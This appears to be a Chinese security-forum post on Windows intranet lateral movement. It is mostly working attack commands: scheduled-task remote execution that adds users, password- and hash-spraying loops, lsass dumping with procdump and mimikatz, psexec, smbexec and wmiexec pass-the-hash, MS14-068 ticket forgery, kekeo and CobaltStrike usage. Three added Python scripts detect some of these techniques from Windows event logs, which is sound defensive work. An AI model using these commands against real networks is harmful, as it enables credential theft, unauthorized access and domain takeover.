Intranet penetration: a practical summary of lateral movement

0x00 Summary of the two approaches to intranet lateral movement

Lateral movement in an intranet takes two forms: credential passing and vulnerability exploitation.

Passing uses built-in protocols and commands, for example winrs, winrm, RDP and SPN scanning, to reach other intranet hosts, or tools such as CobaltStrike and Ladon that wrap the same techniques.

Exploitation uses a vulnerability in the host (a CVE such as CVE-2020-1472) to gain access to other intranet hosts.

0x01 Lateral movement: at and schtasks passing

Prerequisite: ports 139/445 open on the target, and the clear-text password or hash of an account on the other host.

1) at passing:
The at command works when the target is older than Windows Server 2012 and the clear-text password of a target account is known; commands can then be executed directly on the remote host. at and sc need ports 135/445 open, which is normally the case; if they are not, move by other means.

Utilization process:

  1. Establish an IPC$ connection to the target host using the known account and password. If it fails, the account may lack the required permissions.
  2. Copy the command script to the target host.
  3. Check the target's local time and create a scheduled task (at or schtasks) that runs the copied script at that time.
  4. Delete the IPC$ connection.

Establish the IPC$ connection: net use \\\ipc$ "" /user:administrator
Create user.bat locally, containing the command to run on the target's C: drive: net user haha /add
Upload the file to the other host's C: drive: copy user.bat \\\c$
Schedule the task on the other host: at \\ 12:20 c:\user.bat
Wait for the task to run and confirm that the user haha has been added on the other host.

Detailed steps (screenshots not reproduced): establish the connection; copy the file and add the task; verify that the task was added successfully.

Common error codes when establishing IPC$:
(1) 5: Access is denied. The account used is probably not an administrator and needs elevation first.
(2) 51: Network problem; Windows cannot find the network path.
(3) 53: Network path not found. Possible causes: wrong IP address, target powered off, target LanmanServer service not started, or a firewall in the way.
(4) 67: Network name not found. The local LanmanWorkstation service is not started, or the target has removed the ipc$ share.
(5) 1219: The supplied credentials conflict with an existing credential set. An IPC$ session already exists and must be deleted first.
(6) 1326: Wrong account or password.
(7) 1792: The target's NetLogon service is not started; common when connecting to a domain controller.
(8) 2242: The user's password has expired; the target's account policy forces periodic password changes.

Reasons an IPC$ connection can fail:
(1) The target is not running an NT-based (or later) operating system.
(2) The target has not enabled the IPC$ share.
(3) The target does not have port 139 or 445 open, or a firewall blocks them.
(4) The command was mistyped, or the account or password is wrong.

2) schtasks passing:
The at command requires a target older than Windows Server 2012; schtasks supports 2012 and later versions.

Utilization process:
Establish the IPC$ connection: net use \\\ipc$ "" /user:administrator
Copy the bat script: copy user.bat \\\c$
Create a task named adduser that runs the copied file: schtasks /create /s /ru "SYSTEM" /tn adduser /sc DAILY /tr c:\user.bat /F
Run the task: schtasks /run /s /tn adduser /i
Delete the task: schtasks /delete /s /tn adduser /f
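From the target's side, the at/schtasks steps above leave two records in the Security log: a network logon (event 4624, logon type 3) by the account used for the IPC$ session, followed within seconds by a scheduled task creation (event 4698). The script below is an added example, not code from the original post: it correlates the two over constructed sample records, assuming the field names of the Security log XML (TargetUserName, LogonType, IpAddress, SubjectUserName, TaskName, TaskContent) and ISO timestamps.

```python
from datetime import datetime, timedelta

# Constructed sample records (not real logs): two network logons and two
# scheduled-task creations on the same file server.
EVENTS = [
    {"EventID": 4624, "Computer": "FILESRV01", "TargetUserName": "administrator",
     "LogonType": 3, "IpAddress": "10.0.0.7", "Time": "2021-10-04T12:19:20"},
    {"EventID": 4624, "Computer": "FILESRV01", "TargetUserName": "svc_backup",
     "LogonType": 3, "IpAddress": "10.0.0.9", "Time": "2021-10-04T09:00:00"},
    {"EventID": 4698, "Computer": "FILESRV01", "SubjectUserName": "administrator",
     "TaskName": "\\adduser", "TaskContent": "c:\\user.bat",
     "Time": "2021-10-04T12:20:00"},
    {"EventID": 4698, "Computer": "FILESRV01", "SubjectUserName": "svc_backup",
     "TaskName": "\\Backup\\Nightly", "TaskContent": "C:\\Backup\\run.cmd",
     "Time": "2021-10-04T18:00:00"},
]


def remote_task_creations(events, window_s=300):
    """Pair each 4698 (task created) with a preceding 4624 type-3 (network)
    logon by the same account on the same host within window_s seconds.
    A hit means the task was created over the network, which is what the
    at/schtasks technique looks like from the target."""
    logons = [e for e in events if e["EventID"] == 4624 and e["LogonType"] == 3]
    hits = []
    for task in (e for e in events if e["EventID"] == 4698):
        t_task = datetime.fromisoformat(task["Time"])
        for lg in logons:
            if (lg["Computer"] != task["Computer"]
                    or lg["TargetUserName"].lower() != task["SubjectUserName"].lower()):
                continue
            delta = t_task - datetime.fromisoformat(lg["Time"])
            if timedelta(0) <= delta <= timedelta(seconds=window_s):
                hits.append((task, lg))
    return hits


def describe(hit):
    task, logon = hit
    return (f"{task['Computer']}: task {task['TaskName']} running {task['TaskContent']} "
            f"created by {task['SubjectUserName']} shortly after a network logon "
            f"from {logon['IpAddress']}")


if __name__ == "__main__":
    for hit in remote_task_creations(EVENTS):
        print(describe(hit))
```

Only the administrator task is reported: the backup task was created nine hours after that account's last network logon, so it falls outside the window. Auditing of "Other Object Access Events" must be enabled for 4698 to be written at all, and the window should be tuned to the environment.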

3) atexec.exe lateral hash passing:
atexec is readily flagged by antivirus, so in practice it needs AV evasion.

Batch-file loops (%%i is batch-file variable syntax) that try each entry in a list; the annotations after # describe each line:
FOR /F %%i in (ips.txt) do net use \\%%i\ipc$ "admin!@#45" /user:administrator   # batch check of which IPs accept the clear-text password
FOR /F %%i in (ips.txt) do atexec.exe ./administrator:admin!@#45@%%i whoami   # same check, with command echo
FOR /F %%i in (pass.txt) do atexec.exe ./administrator:%%i@ whoami   # batch check of which clear-text password matches the IP, with echo
FOR /F %%i in (hash.txt) do atexec.exe -hashes :%%i ./administrator@ whoami   # batch check of which hash matches the IP, with echo

4) Python batch check of IP, password and account validity:
Package the script as an exe with pyinstaller and run it (the original shows screenshots of the generated file and its location).
Python batch detection, using the collected domain IP information and the account/password information as dictionaries:

import os, time

# Placeholder lists: fill with the collected IPs, accounts and passwords
ips = ["10.0.0.5"]
users = ["administrator"]
passs = ["Password1"]

for ip in ips:
    for user in users:
        for mima in passs:  # mima = password
            # Builds: net use \\<ip>\ipc$ <password> /user:<user>
            cmd = "net use \\\\" + ip + "\\ipc$ " + mima + " /user:" + user
            print(cmd)

0x02 Lateral movement: SMB-based psexec and smbexec passing

psexec and smbexec connect over the SMB service, so port 445 must be open; both accept a clear-text password or a hash.

First, use procdump and mimikatz to obtain the clear-text password and hash on the current machine.
Install procdump:
Generate the lsass.dmp file: procdump -accepteula -ma lsass.exe lsass.dmp
Decrypt the password from the dump with mimikatz:
sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords full

1) psexec passing:
Method one: first establish an IPC$ connection, then pass the clear-text password or hash. Administrator privileges on the other host are required, otherwise an error occurs.
psexec is an official Microsoft (Sysinternals) tool and is not flagged by antivirus:

Establish the IPC$ connection: net use \\\ipc$ "" /user:administrator
Use psexec to get a cmd window back: psexec \\ -s cmd

Method two: supply the clear-text account and password directly, without establishing IPC$:

Delete the IPC$ connection: net use * /delete
Direct clear-text connection: psexec \\ -u administrator -p -s cmd
Hash connection:
psexec -hashes :$HASH$ ./administrator@
psexec -hashes :$HASH$ domain/administrator@
psexec -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@
The official PsTools psexec cannot pass a hash; the impacket toolkit's psexec is needed, which is easy to use but readily flagged by antivirus.
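Both psexec variants and smbexec work by installing a service on the target, so the System log's event 7045 ("A service was installed in the system") is the record to watch. Sysinternals PsExec installs a service named PSEXESVC with its binary dropped in %SystemRoot% (the root of the ADMIN$ share); impacket's smbexec defaults to a service named BTOBTO whose "binary" is a cmd.exe one-liner that writes output to a loopback UNC path. The triage below is an added example, not from the original post; the 7045 records are constructed, and the random-looking service name is modelled on impacket psexec, which picks one at random.

```python
import re

# Service names used by common tooling: Sysinternals PsExec installs
# PSEXESVC; impacket's smbexec defaults to BTOBTO.
KNOWN_TOOL_SERVICES = {"psexesvc", "btobto"}


def service_install_findings(event):
    """Return the reasons (possibly none) a 7045 service-install record looks
    like remote execution rather than a normal software install."""
    name = event["ServiceName"].lower()
    low = event["ImagePath"].lower()
    reasons = []
    if name in KNOWN_TOOL_SERVICES:
        reasons.append("known-tool-service-name")
    # A real service binary is an executable, not a shell command line
    if "%comspec%" in low or "cmd.exe" in low:
        reasons.append("service-binary-is-a-shell-command")
    # smbexec-style output collection through the target's own share
    if "\\\\127.0.0.1\\" in low:
        reasons.append("loopback-unc-redirect")
    # Executable dropped directly into %SystemRoot%, i.e. the ADMIN$ share root
    if re.match(r"^(%systemroot%|c:\\windows)\\[^\\]+\.exe$", low):
        reasons.append("binary-in-admin-share-root")
    return reasons


def triage(events):
    """(ServiceName, reasons) for every record with at least one finding."""
    out = []
    for e in events:
        reasons = service_install_findings(e)
        if reasons:
            out.append((e["ServiceName"], reasons))
    return out


# Constructed System-log 7045 records (not real logs).
EVENTS = [
    {"ServiceName": "PSEXESVC", "ImagePath": r"%SystemRoot%\PSEXESVC.exe",
     "AccountName": "LocalSystem"},
    {"ServiceName": "BTOBTO",
     "ImagePath": r"%COMSPEC% /Q /c echo whoami ^> \\127.0.0.1\C$\__output 2^>^&1 > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat",
     "AccountName": "LocalSystem"},
    # Random-looking name and matching binary, modelled on impacket psexec
    {"ServiceName": "xKtRwQpL", "ImagePath": r"%SystemRoot%\xKtRwQpL.exe",
     "AccountName": "LocalSystem"},
    {"ServiceName": "MyApp Updater", "ImagePath": r"C:\Program Files\MyApp\updater.exe",
     "AccountName": "LocalSystem"},
]


if __name__ == "__main__":
    for name, reasons in triage(EVENTS):
        print(f"{name}: {', '.join(reasons)}")
```

The name-based rule only catches tools run with their defaults (PsExec's service name can be changed with -r, and impacket's can be edited), which is why the path heuristics matter more: a service whose binary sits loose in C:\Windows or is a cmd.exe command line is rare in normal software installs.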

2) smbexec passing
No IPC$ connection is needed first; pass the clear-text password or hash directly.
This uses the impacket toolkit.
exe download address:
py version:

Clear-text passing command: smbexec
Hash passing:
smbexec -hashes :$HASH$ ./admin@
smbexec -hashes :$HASH$ domain/admin@

0x03 Lateral movement: WMI-based wmic and wmiexec passing

Port 135 must be open. WMI supports clear-text and hash passing without leaving any trace in the logs.
1) wmic passing
1. Clear-text passing without echo

Make the connection; the command's output is written to a file that has to be read on the other host:
wmic /node: /user:administrator / process call create "cmd.exe /c ipconfig >C:\1.txt"

Read the value:

2. Clear-text passing with echo, which requires the vbs file:

cscript //nologo wmiexec.vbs /shell administrator

3. Clear-text or hash passing with echo using the impacket toolkit's wmiexec; the exe version may be flagged by antivirus.
Toolkit address:

Workgroup environment: wmiexec ./account:Password@ "whoami"
Domain environment: wmiexec god/ "whoami"
Hash passing:
wmiexec -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@ "whoami"
wmiexec -hashes :ccef208c6485269c20db2cad21734fe7 god/administrator@ "whoami"
View the C: drive: wmiexec "dir /c"
Batch detection, looping over accounts and hashes, exported as an exe with Python's pyinstaller module: pyinstaller.exe -F

import os, time

# Placeholder lists: fill with the collected IPs, accounts and hashes
ips = ["10.0.0.5"]
users = ["administrator"]
hashs = ["ccef208c6485269c20db2cad21734fe7"]

for ip in ips:
    for user in users:
        for mimahash in hashs:  # mimahash = password hash
            # wmiexec -hashes :<hash> god/<user>@<ip> whoami
            cmd = "wmiexec -hashes :" + mimahash + " god/" + user + "@" + ip + " whoami"
            print('--->' + cmd + '<---')
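The claim that WMI leaves no trace holds for the target's Security log by default, but not for process telemetry: every command started through Win32_Process.Create is a child of the WMI provider host, WmiPrvSE.exe. That parent is the hook for detection, and the two output-collection styles above add a second signal: the wmic example redirects output to a file on the C: drive, and impacket's wmiexec redirects it to \\127.0.0.1\ADMIN$\__<timestamp>. The following is an added example, not from the original post, run over constructed Sysmon Event ID 1 style records (assumed fields Image, ParentImage, CommandLine).

```python
import re

SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}

# impacket wmiexec collects output through the target's own ADMIN$ share:
#   cmd.exe /Q /c <cmd> 1> \\127.0.0.1\ADMIN$\__<timestamp> 2>&1
WMIEXEC_REDIRECT = re.compile(r"\\\\127\.0\.0\.1\\admin\$\\__", re.IGNORECASE)


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def score_process(event):
    """Reasons a process-creation record looks like WMI remote execution.
    Empty list for anything not spawned by the WMI provider host."""
    reasons = []
    if basename(event["ParentImage"]) != "wmiprvse.exe":
        return reasons
    if basename(event["Image"]) in SHELLS:
        reasons.append("shell-spawned-by-wmi-provider-host")
    if WMIEXEC_REDIRECT.search(event["CommandLine"]):
        reasons.append("wmiexec-style-output-redirect")
    elif ">" in event["CommandLine"]:
        # wmic ... process call create "cmd.exe /c ipconfig >C:\1.txt"
        reasons.append("output-redirected-to-file")
    return reasons


def wmi_spawned_shells(events):
    out = []
    for e in events:
        reasons = score_process(e)
        if reasons:
            out.append((e["CommandLine"], reasons))
    return out


# Constructed process-creation records (not real logs).
EVENTS = [
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "CommandLine": r"cmd.exe /c ipconfig >C:\1.txt"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "CommandLine": r"cmd.exe /Q /c whoami 1> \\127.0.0.1\ADMIN$\__1633363200.5 2>&1"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "cmd.exe"},
    # Monitoring agent legitimately launched through WMI: no shell, no redirect
    {"Image": r"C:\Program Files\Monitoring\agent.exe",
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "CommandLine": "agent.exe --collect"},
]


if __name__ == "__main__":
    for cmdline, reasons in wmi_spawned_shells(EVENTS):
        print(cmdline, "->", ", ".join(reasons))
```

Management products do launch processes through WMI, so the parent alone is a weak signal; a shell child plus an output redirect is the combination worth alerting on. Process command-line logging (Sysmon, or 4688 with command-line auditing enabled) is required for the redirect checks to have anything to match.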

0x04 Lateral movement: PTH, PTK and PTT passing

Notes on these three: with PTH, when patch KB2871997 is installed on the other host, PTH with mimikatz can only connect as domain users, not users of other groups. PTK requires patch KB2871997 on the other host; it can then connect as domain users or groups, using an AES256 key. PTH and PTK are based on NTLM authentication, while PTT is based on the Kerberos protocol.

1) PTH passing with mimikatz:
Patched host, passing the NTLM hash:

Elevate: privilege::debug
NTLM passing: sekurlsa::pth /user:administrator / /ntlm:ccef208c6485269c20db2cad21734fe7
NTLM workgroup collision: other hosts in the group may have the same administrator hash value:
sekurlsa::pth /user:administrator /domain:workgroup /ntlm:518b98ad4178a53695dc997aa02d455c
NTLM domain-user passing: sekurlsa::pth /user:hsyy / /ntlm:ccef208c6485269c20db2cad21734fe7

2) PTK passing with mimikatz, which requires patch KB2871997:

Use mimikatz to obtain the aes256_hmac key: sekurlsa::ekeys
Passing connection:
sekurlsa::pth /user:mary/

3) PTT passing via MS14-068:
MS14-068 allows an ordinary domain user to obtain domain-controller system privileges.

Steps to take over (MS14-068 executed from PowerShell):
1. View the current SID: whoami /user
2. Purge all credentials on the current machine; any remaining domain-member credentials would interfere with the forged ticket: mimikatz # kerberos::purge
3. View the current machine's credentials: mimikatz # kerberos::list
4. Inject the ticket into memory: mimikatz # kerberos::ptc <ticket file>
5. Generate the TGT data with MS14-068: ms14-068.exe -u <domain member>@<domain name> -s <sid> -d <domain controller address> -p <domain member password>
6. Inject it into memory: mimikatz.exe "kerberos::ptc <ticket file>" exit
7. View the ticket list: klist
8. Use the privileges: dir \c$

Step implementation:
1. View the SID: whoami /user
2. Generate the ticket with MS14-068: ms14-068.exe -u <domain member>@<domain name> -s <sid> -d <domain controller address> -p <domain member password>
3. Inject the ticket:

4. Connect to the domain controller to take over:
If the address is not recognized, replace the IP with the domain computer name.

4) PTT passing with kekeo:

PTT knowledge point: the PTT persistence techniques are the Golden ticket and the Silver ticket.

Steps:
1. Generate the ticket with kekeo: kekeo "tgt::ask /user:mary/"
2. Import the ticket: kerberos::ptt
3. View the ticket: klist
4. Load dir \\c$ via net use

5) PTT with local tickets using mimikatz (administrator rights required):

Elevate privileges: privilege::debug
Export tickets: sekurlsa::tickets /export
Use a ticket: kerberos::ptt xxxxxxxxx.xxxx.kirbi

6) Recommended tool: Ladon
Ladon is a domestically developed intranet penetration toolkit, covering information collection, protocol scanning, vulnerability probing, passing attacks, and more.
Download address:

0x05 Lateral movement: RDP and SPN scanning

1) RDP passing:

RDP is similar to SSH remote connection on Linux: with the other host's IP, account and password you can connect.
Port 3389 must be open.
Run from cmd: mstsc
Clear-text passing works; hash passing over RDP is of limited practical value.

2) SPN scanning:

When a computer joins a domain, its primary SPN is automatically added to the ServicePrincipalName attribute of the domain computer account. When a new service is installed, its SPN is recorded in the corresponding attribute of the computer account.
SPN scanning is also called Kerberos service instance name scanning, and it is the best way to discover services in Active Directory: it finds services by requesting the service principal names of a specific SPN type. Its main feature is that, unlike network port scanning, it does not need to connect to every IP address in the network to check service ports, so it does not trigger a large number of warnings from IPS/IDS devices in the intranet.
Because SPN queries are part of normal Kerberos ticket behaviour, detection is difficult.
Since SPN scanning queries the domain controller over LDAP, an attacker only needs ordinary domain user privileges to perform it.

0x06 Lateral movement: CobaltStrike

Usage process:
1. Start, configure, create a listener, get the beacon online, collect information (network, credentials, location, etc.), then move laterally.
2. Startup and configuration
3. Beacon check-in and plug-in loading
4. Information collection commands
5. View automation

Installation and usage:

Domain penetration reference:
CS4.0 manual:
Extraction code: hsyy

Discussion and learning:
CSDN community: Addressing Fever

Tags: Windows Intranet Penetration

Posted on Mon, 04 Oct 2021 12:45:43 -0400 by pytrin